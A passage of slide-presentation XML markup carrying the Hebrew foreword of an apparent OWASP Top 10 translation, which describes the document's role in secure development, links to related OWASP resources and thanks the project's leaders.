                        <a:t>. הדבר מלמד כמה התלהבות קיימת בקהילה עבור מסמך </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>OWASP Top 10</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, והדבר בעיקר מחייב את עבור ארגון </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>OWASP</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> להיות מדויק בנוגע לעשרת חולשות האבטחה המהותיות ביותר.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="r" rtl="1">
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>אומנם המטרה המקורית של מסמך </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>OWASP Top 10</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> הייתה לעורר מודעות בקרב מפתחים ומנהלים, המסמך נהפך לתקן בפועל בנושא פיתוח מאובטח.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="r" rtl="1">
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>במהדורה זה, נושאים והמלצות נכתבו בתמציתיות ובצורה בדוקה על-מנת לסייע להטמיע את ההמלצות של </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>OWASP Top 10</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> כחלק מתהליכי פיתוח מאובטח. אנו מעודדים ארגונים להשתמש במסמך </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId4"/>
                        </a:rPr>
                        <a:t>OWASP Application Security Verification Standard (ASVS)</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId4"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>במידה וקיים צורך בתקן, אך לרוב מסמך </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>OWASP Top 10</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> הינו התחלת המסע לפיתוח מאובטח.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="r" rtl="1">
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>כתבנו מגוון המלצות לצעדים הבאים עבור מסמך </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>OWASP Top 10</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, לרבות </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId5" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>מה הדבר הבא עבור מפתחים</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId6" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>מה הדבר הבא עבור בודקי תוכנה</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId7" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>מה הדבר הבא עבור ארגונים</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, אשר מיועדים למנהלים בדרגת </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>CIO</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> ו-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>CISO</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> וכן </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId8" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>מה הדבר הבא עבור מנהלי מערכות</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, אשר מיועד עבור מנהלי יישומים או כל אחד האחראי על מחזור חיי מערכת.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="r" rtl="1">
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>בטווח הארוך, אנו מעודדים את כל צוותי הפיתוח והארגונים ליצור תהליך פיתוח מאובטח התואם לתרבות ולטכנולוגיה הנהוגה בארגון. תהליכים אלו מגיעים בכל צורה וגודל. מנף את חוזקת הארגון שלך על-מנת למדוד ולשפר את תהליך הפיתוח המאובטח באמצעות </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId9"/>
                        </a:rPr>
                        <a:t>מודל למדידת רמת הבגרות של תהליך הפיתוח</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="r" rtl="1">
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>אנו מקווים כי מסמך </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>OWASP Top 10</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> יהיה שימושי עבור מאמצי הפיתוח המאובטח. תרגיש חופשי ליצור קשר עם ארגון </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>OWASP</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> בשאלות, הערות ורעיונות או באמצעות מאגר פרויקט ה-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>GitHub</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>:</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="171450" marR="0" lvl="0" indent="-171450" algn="r" defTabSz="914400" rtl="1" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:buChar char="•"/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId10"/>
                        </a:rPr>
                        <a:t>https://github.com/OWASP/Top10/issues</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950" dirty="0" smtClean="0">
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" indent="0" algn="r" rtl="1">
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>ניתן למצוא את התרגום של מסמך </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>OWASP Top 10</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> לשפות השונות</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> בקישור:</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="171450" marR="0" lvl="0" indent="-171450" algn="r" defTabSz="914400" rtl="1" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:buChar char="•"/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId11"/>
                        </a:rPr>
                        <a:t>https://www.owasp.org/index.php/top10</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950" dirty="0" smtClean="0">
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" indent="0" algn="r" rtl="1">
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>לבסוף, אנו מעוניינים להודות להנהגת</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> פרויקט </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>OWASP Top 10</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, דייב </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>ויצ'רס</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>וג'ף</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> ויליאמס עבור המאמצים והאמונה שלהם בנו על-מנת לסיים כתיבת מסמך זה בסיוע הקהילה. תודה לכם!</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="82550" marR="0" lvl="0" indent="-82550" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buChar char="•"/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Andrew </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>van der Stock</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="82550" marR="0" lvl="0" indent="-82550" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buChar char="•"/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Brian Glas</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="82550" marR="0" lvl="0" indent="-82550" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buChar char="•"/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Neil Smithlin</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>e</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="82550" marR="0" lvl="0" indent="-82550" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buChar char="•"/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
